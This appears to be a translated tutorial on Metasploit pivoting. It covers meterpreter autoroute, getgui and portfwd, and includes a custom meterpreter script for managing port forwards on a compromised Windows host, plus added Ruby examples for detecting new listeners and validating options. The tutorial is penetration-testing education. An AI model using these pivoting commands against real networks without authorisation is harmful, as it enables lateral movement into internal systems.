The most exciting thing about a first contact with MSF is the springboard (pivoting) function. By adding a route through MSF, you can use MSF directly to reach an internal network that was not originally accessible (establishing the access connection is the first step of a penetration). Once the connection is established, the rest of the framework can be pointed at that network.
Use meterpreter's autoroute function for this. First run the get_local_subnets script to find the subnet of the compromised system, then run the autoroute script to add the route. After this you will see the added routing table: the gateway is session 3, i.e. the payload process. If I now give a module in MSF a target address of 192.168.244.*, the traffic is forwarded through the session 3 gateway to reach the target IP.
There is also a frequently used port-mapping function for establishing network connections. Meterpreter has a getgui script (there are many ready-made scripts in my BT (BackTrack) script directory /opt/metasploit/msf3/scripts/meterpreter, as shown in the figure below).
According to the Metasploit penetration testing guide, getgui can map the remote port 3389 to a specified local port, which is exactly such a mapping (port forwarding) process.
Let's see how to use it. It's very simple. Here I don't add a user name and password but directly establish the connection: run getgui -e -f 8080
After execution the connection is established.
The connection can be established and the forwarding is successful.
But in penetration testing the requirements keep changing, and I had run into this one before: is it possible to map and connect to an arbitrary port of an intranet machine? With this question in mind, I took a look at the implementation code of getgui.
I haven't learned Ruby, but after reading this code it is easy to understand: when run getgui -e -f 8080 is executed, the frwrd variable is set to true if -f is given, and the port following -f is saved in the variable lport. When frwrd is true, portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1 is called to map the remote port 3389 (127.0.0.1 is relative to the payload, i.e. the compromised host) to the specified local port.
So only this one command is needed to establish the mapping. Search for the file where the command is defined:
It turns out to be defined in /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb.
This is the actual implementation of the command, and the meaning of each parameter is easy to see from the option definitions.
You can see that several subcommands are supported: add, delete, list and so on.
So, following the same pattern: if I want to map port 10081 of the remote host to port 10081 of the local host, how do I implement it?
Just one line:
client.run_cmd("portfwd add -L 0.0.0.0 -l 10081 -p 10081 -r 127.0.0.1")
Create changeport.rb in the directory /opt/metasploit/msf3/scripts/meterpreter.
Run the script you created:
Look at the port status:
Mapping succeeded.
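The "look at the port status" check above, generalized into a reusable check. This is an added example, not code from the original post or from Metasploit: it parses two netstat-style snapshots of listening sockets (the snapshot text is constructed here; the column layout Proto / Local Address / Foreign Address / State is assumed) and reports which listeners are new, flagging wildcard binds. On the MSF host it confirms that a forward is up; on any host you administer, an unexpected new listener bound to 0.0.0.0 is exactly the kind of change worth noticing.

```ruby
# Added example (not from the original post): diff two listening-socket snapshots
# and report newly bound listeners, flagging wildcard (network-reachable) binds.
# Snapshots are constructed to resemble `netstat -an` output on Windows; the
# field layout Proto / Local Address / Foreign Address / State is an assumption.

require 'set'

BASELINE = <<~SNAP
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.244.10:49152   192.168.244.1:4444     ESTABLISHED
SNAP

CURRENT = <<~SNAP
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:10081          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:3389         0.0.0.0:0              LISTENING
  TCP    192.168.244.10:49152   192.168.244.1:4444     ESTABLISHED
SNAP

# Parse netstat-style text into a Set of "addr:port" strings for TCP sockets in LISTENING state.
def listeners(snapshot)
  snapshot.each_line.with_object(Set.new) do |line, acc|
    fields = line.split
    next unless fields.size >= 4 && fields[0] == 'TCP' && fields[3] == 'LISTENING'
    acc << fields[1]
  end
end

# Listeners present in `current` but absent from `baseline`, sorted for stable output.
def new_listeners(baseline, current)
  (listeners(current) - listeners(baseline)).to_a.sort
end

# A listener bound to 0.0.0.0 (or [::]) is reachable from other hosts; a forward
# created with `portfwd add -L 0.0.0.0 ...` looks exactly like this. A loopback
# bind is only reachable from the host itself.
def wildcard_bind?(endpoint)
  endpoint.start_with?('0.0.0.0:', '[::]:')
end

# One human-readable line per new listener, with a risk label.
def report(baseline, current)
  new_listeners(baseline, current).map do |ep|
    risk = wildcard_bind?(ep) ? 'HIGH (reachable from the network)' : 'low (loopback only)'
    "new listener #{ep} - #{risk}"
  end
end

if __FILE__ == $0
  puts report(BASELINE, CURRENT)
end
```

Run it against two real `netstat -an` captures taken before and after a change; only the LISTENING rows are compared, so established connections coming and going do not create noise.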
As you can see from the portfwd command above, it supports the add, delete and list subcommands, so we can enrich our own script to add, delete and view port mappings. The following script does that:
# Author: buchedan.org
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],                   # a bare flag: takes no value
  "-c" => [ true,  "Command: add, list or del." ],
  "-l" => [ true,  "Local port (must not already be in use)." ],
  "-r" => [ true,  "Remote IP to connect to." ],
  "-p" => [ true,  "Remote port to connect to." ]
)

def usage
  print_line("portfwd ")
  print_line("Usage: changeport -c add -l <localport> -r <remoteip> -p <remoteport>")
  print_line("Usage: changeport -c list ")
  print_line("Usage: changeport -c del -l <localport> ")
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end

def message
  print_status "portfwd remoteip port to localport"
  print_status "http://buchedan.org"
end

################## MAIN ##################
# Parsing of Options (locals must be declared before the block so it can assign them)
cmd = nil
lport = nil
rip = nil
rport = nil
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-c"
    cmd = val
  when "-h"
    usage
  when "-l"
    lport = val
  when "-r"
    rip = val
  when "-p"
    rport = val
  end
}

if client.platform =~ /win32|win64/
  if args.length > 0
    # show info
    message
    case cmd
    when "list"
      client.run_cmd("portfwd list")
    when "add"
      if (!lport or !rip or !rport)
        print_error("You must supply a local port, remote host, and remote port.")
        return
      end
      client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p #{rport} -r #{rip}")
      #print_status("Starting the #{rip}:#{rport} forwarding at local port #{lport}")
    when "del"
      if (!lport)
        print_error("You must supply a local port.")
        return
      else
        client.run_cmd("portfwd delete -L 0.0.0.0 -l #{lport}")
      end
    end
  else
    usage
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end
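To make the script's option handling testable on its own, here is the same -c/-l/-r/-p logic written as pure functions with no meterpreter dependency. This is an added example, not the post's script and not Metasploit code: `parse_opts` is a hypothetical stand-in for Rex::Parser::Arguments#parse that only understands the flags used here, and `build_portfwd` returns the command string the script would have run (or an error) instead of running anything. It also adds the checks the original lacks: ports must be integers in 1..65535 and -r must be an IPv4 literal, so a typo is rejected before anything is bound.

```ruby
# Added example (not the post's script, not Metasploit code): the changeport
# option handling as pure functions, with input validation the original lacks.
# parse_opts is a hypothetical stand-in for Rex::Parser::Arguments#parse.

require 'ipaddr'

OPTS_WITH_VALUE = %w[-c -l -r -p].freeze

# Turn an argv-style array into a hash; options that take a value consume the next token.
def parse_opts(argv)
  opts = {}
  i = 0
  while i < argv.size
    tok = argv[i]
    if OPTS_WITH_VALUE.include?(tok)
      raise ArgumentError, "#{tok} needs a value" if argv[i + 1].nil?
      opts[tok] = argv[i + 1]
      i += 2
    elsif tok == '-h'
      opts['-h'] = true
      i += 1
    else
      raise ArgumentError, "unknown option #{tok}"
    end
  end
  opts
end

# A port must be a decimal integer in 1..65535; the original script never checked this.
def valid_port?(s)
  s.to_s.match?(/\A\d+\z/) && (1..65535).cover?(s.to_i)
end

# Only accept an IPv4 literal, which is what -r is meant to carry.
def valid_ipv4?(s)
  IPAddr.new(s.to_s).ipv4?
rescue IPAddr::InvalidAddressError, ArgumentError
  false
end

# Build the portfwd command the script would issue.
# Returns [:ok, cmd], [:help, nil] or [:error, message]; nothing is executed.
def build_portfwd(argv)
  opts = parse_opts(argv)
  return [:help, nil] if opts['-h'] || opts.empty?
  lport, rip, rport = opts['-l'], opts['-r'], opts['-p']
  case opts['-c']
  when 'list'
    [:ok, 'portfwd list']
  when 'add'
    return [:error, 'You must supply a local port, remote host, and remote port.'] unless lport && rip && rport
    return [:error, "invalid local port #{lport}"] unless valid_port?(lport)
    return [:error, "invalid remote port #{rport}"] unless valid_port?(rport)
    return [:error, "invalid remote IP #{rip}"] unless valid_ipv4?(rip)
    [:ok, "portfwd add -L 0.0.0.0 -l #{lport} -p #{rport} -r #{rip}"]
  when 'del'
    return [:error, 'You must supply a local port.'] unless lport
    return [:error, "invalid local port #{lport}"] unless valid_port?(lport)
    [:ok, "portfwd delete -L 0.0.0.0 -l #{lport}"]
  else
    [:error, "unknown command #{opts['-c'].inspect}; use add, list or del"]
  end
rescue ArgumentError => e
  [:error, e.message]
end

if __FILE__ == $0
  p build_portfwd(%w[-c add -l 10081 -r 127.0.0.1 -p 10081])
  p build_portfwd(%w[-c add -l 99999 -r 127.0.0.1 -p 10081])
  p build_portfwd(%w[-c list])
end
```

Keeping the decision logic separate from the `client.run_cmd` call is the point: the part that can go wrong (parsing and validation) can be exercised with plain Ruby, and the part that touches a session stays a one-liner.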
Put it under /opt/metasploit/msf3/scripts/meterpreter.
Usage demonstration:
It can display help information, establish a mapping, display the mappings and delete a mapping. Of course the English in it is not well written; as long as you can understand it.
Looking back later, I realized how silly I had been: meterpreter itself already has this portfwd function, which can be used directly. All this was completely redundant. Add, list and delete are all fully implemented there.
Summary
This article mainly covers using lcx for port forwarding, connecting two intranet machines (the target machine and the MSF host), and using an msfpayload as the springboard to continue the penetration. Finally, it implements simple port mapping and introduces basic meterpreter script programming.
Remarks:
This article uses a payload under Windows as the example; in fact MSF supports many kinds of scripts for establishing the connection.
Related article link: Metasploit post-penetration skills [1]